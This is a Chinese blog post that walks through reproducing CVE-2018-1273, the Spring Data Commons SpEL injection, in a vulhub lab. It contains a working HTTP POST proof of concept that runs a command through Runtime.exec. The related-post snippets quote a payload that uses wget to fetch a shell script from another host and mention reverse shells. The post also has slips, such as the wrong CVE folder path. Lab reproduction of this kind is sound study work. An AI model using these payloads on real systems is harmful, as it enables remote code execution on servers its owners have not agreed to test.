【vulhub系列】cve-2018-1273S pring Expression Language 漏洞复现

已于 2022-10-04 20:24:19 修改
阅读量296 收藏 1
点赞数
分类专栏: 记录一下vulhub靶场复现 文章标签: 网络安全 安全
于 2022-08-12 14:35:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wiofgb/article/details/126303453
版权

记录一次cve-2018-1273S pring Expression Language 漏洞复现

 

文章目录

  • 前言
  • 一、环境搭建
  • 二、进行漏洞复现

前言

对于漏洞信息和打开docker就不做步骤了。

一、环境搭建

二、进行漏洞复现

1、进入打开终端,进入目标路径下:

cd vulhub-master/spring/CVE-2022-22965/

2、打开docker容器:

docker-compose up -d

查看开启端口和本机IP:

docker ps        #查看开启端口
 
ifconfig         #查看本机IP

查看环境搭建是否成功:http://192.168.162.129:8080

示例:

POC

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.162.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: Referer: http://localhost:8080/users?page=0&size=5
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.162.129:8080/users?page=0&size=5
Connection: close
Origin: http://192.168.162.129:8080/users?page=0&size=5
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 124

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

通过抓包软件抓取目标数据包并将poc添加进去:

示例:

返回kaliLinux攻击机并执行下列命令:

docker-compose exec spring bash

ls

cd tmp

ls

示例:

当tmp目录下有success文件时即说明验证成功

一只学网安的小白。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulmap——CVE-2018-1273漏洞Spring Data Commons 远程命令执行
记录并分享学习安全的知识点..
01-16 839
一、漏洞介绍 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 二、影响版本 Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (I
cve-2018-1273思路及简单利用(避坑)
weixin_45695535的博客
04-01 6851
过程环境准备攻击流程vulhub环境搭建构造poc利用-反弹shell-bash指令构造(失败)利用-反弹shell-从自己服务器下载.sh文件执行总结参考文档 环境准备 作者采用的是搭配是: 一台攻击机(kali-2021)192.168.141.190 受害机(vulhub搭建的)192.168.141.194 一台用来下载反弹shell脚本的服务器(内网,如果有服务器更好)192.168.141.128 攻击流程 vulhub环境搭建 找到cve-2018-1273文件夹,通过"docker-co
CVE-2018-1273漏洞
qq_56426046的博客
09-11 968
搭建好vulhub环境,选择 CVE-2018-1273漏洞通过"docker-compose build"和"docker-compose up -d"拉取环境,之后访问服务器ip:8080/users看环境是否成功。
Spring Data Commons远程命令执行漏洞CVE-2018-1273)
wutiangui的博客
09-10 779
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
spring(CVE-2018-1273)远程代码执行漏洞
最新发布
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
vulhub中Spring之Spring Data Commons 远程命令执行漏洞CVE-2018-1273)
weixin_41438728的博客
12-02 1420
vulhub中Spring之Spring Data Commons 远程命令执行漏洞CVE-2018-1273)漏洞漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞漏洞 漏洞 漏洞说明 漏洞利用条件和方式 漏洞影响范围 漏洞检测 环境搭建 漏洞 漏洞 ...
001--什么是SpringData
weixin_42288943的博客
04-17 167
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
CVE-2018-1273漏洞日志+IDS规则编写
weixin_41174502的博客
07-25 1610
CVE-2018-1273(Spring Data Commons) 远程命令执行漏洞 漏洞描述: Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较旧的不受支持的版本)包含由于特殊元素的不正确中和而导致的属性绑定器漏洞。未经身份验证的远程恶意用户(或攻击者)可以针对Spring Data REST支持的HTTP资源提供特制的请求参数,或者使用Spring Data的基于投影的请求有效负载绑定可能导致远程执行代码攻击。总结来说这是一个spel表
vulhub-CVE-2018-1273远程命令执行漏洞
m0_62008601的博客
09-23 1307
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞
weixin_44023403的博客
03-27 798
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞前期准备一、漏洞二、总结 前期准备 工具:burpsuite、firefox浏览器 环境:kali 一、漏洞 (1)在Vulhub靶场部署好CVE-2018-1273漏洞(上一篇有写操作步骤),在浏览器节目打开http://ip:端口/users,在注册页面提交任意信息,用burp抓包; 找到我们提交的数据,之后发送到repeater进行修改数据包; 构造payload,修改数据包,创建文件,进行发包测试;
Spring Data Commons 远程命令执行漏洞CVE-2018-1273)
klcyl_0106的博客
05-25 419
1.通过"docker-compose build"和"docker-compose up -d"拉取环境 刚开始直接敲命令docker-compose build出错,最后发是未启动docker,所以通过systemctl start docker命令启动docker 2.访问服务器ip:8080/users看环境是否成功 3.注册时抓包,并修改成如下数据包: POST /users?page=&size=5 HTTP/1.1 Host: localhost:8080 Connection:
漏洞 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 1737
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
cve-2018-1273 Spring Expression Language 漏洞分析
whatday的专栏
07-31 1025
目录 0x00 背景 x01 漏洞影响 受影响的范围 0x02 SpEL 类类型表达式 类实例化 变量和函数的使用 0x03 SpEL调试 0x04 实战分析 CVE-2018-1273 攻击Exploit的诞生 0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发都是因为滥用SpEL的StandardEvaluationContext。 x0
vulhubCVE-2022-22947
10-13
CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值